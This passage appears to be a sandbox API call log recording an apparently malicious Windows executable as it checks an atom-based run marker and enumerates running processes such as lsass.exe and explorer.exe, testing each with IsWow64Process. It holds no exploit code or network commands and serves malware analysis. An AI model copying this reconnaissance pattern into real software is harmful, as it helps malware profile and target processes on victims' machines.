	[0070.928] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.928] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.928] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.929] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.930] GetLastError () returned 0x5
	[0070.931] GetLastError () returned 0x5
	[0070.931] GetLastError () returned 0x5
	[0070.931] GetLastError () returned 0x5
	[0070.931] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.931] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.931] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.931] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.931] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0070.931] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.931] CloseHandle (hObject=0x224) returned 1
	[0070.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0070.932] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.932] CloseHandle (hObject=0x224) returned 1
	[0070.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16a98) returned 0xc0000004
	[0070.967] VirtualAlloc (lpAddress=0x0, dwSize=0x16b98, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16b98, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772170, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0070.971] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.971] CloseHandle (hObject=0x224) returned 1
	[0070.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728878, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0070.971] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.972] CloseHandle (hObject=0x224) returned 1
	[0070.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0070.972] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.972] CloseHandle (hObject=0x224) returned 1
	[0070.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0070.972] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.972] CloseHandle (hObject=0x224) returned 1
	[0070.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0070.972] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.972] CloseHandle (hObject=0x224) returned 1
	[0070.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0070.973] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.973] CloseHandle (hObject=0x224) returned 1
	[0070.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0070.973] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.973] CloseHandle (hObject=0x224) returned 1
	[0070.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0070.973] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.973] CloseHandle (hObject=0x224) returned 1
	[0070.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0070.973] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.973] CloseHandle (hObject=0x224) returned 1
	[0070.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0070.973] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.973] CloseHandle (hObject=0x224) returned 1
	[0070.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0070.974] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.974] CloseHandle (hObject=0x224) returned 1
	[0070.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0070.974] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.974] CloseHandle (hObject=0x224) returned 1
	[0070.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0070.974] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.974] CloseHandle (hObject=0x224) returned 1
	[0070.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0070.974] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.974] CloseHandle (hObject=0x224) returned 1
	[0070.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728978, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0070.975] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.975] CloseHandle (hObject=0x224) returned 1
	[0070.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e720, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0070.975] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.975] CloseHandle (hObject=0x224) returned 1
	[0070.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0070.975] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.975] CloseHandle (hObject=0x224) returned 1
	[0070.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0070.975] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.975] CloseHandle (hObject=0x224) returned 1
	[0070.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0070.975] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.975] CloseHandle (hObject=0x224) returned 1
	[0070.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
